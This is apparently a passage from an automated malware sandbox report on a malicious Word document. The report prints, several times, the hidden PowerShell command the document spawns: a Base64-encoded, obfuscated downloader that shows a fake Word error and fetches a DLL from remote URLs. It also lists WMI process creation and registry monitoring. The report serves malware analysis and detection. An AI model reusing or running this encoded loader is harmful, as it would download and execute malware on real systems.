Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzA
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJ
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJ	Jump to behavior

Suspicious powershell command line found

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJ
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJ			Jump to behavior

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 4_2_000007FF00281ADC pushad ; ret

4_2_000007FF00281B41

Persistence and Installation Behavior:

Creates processes via WMI

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Hooking and other Techniques for Hiding and Protection:

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
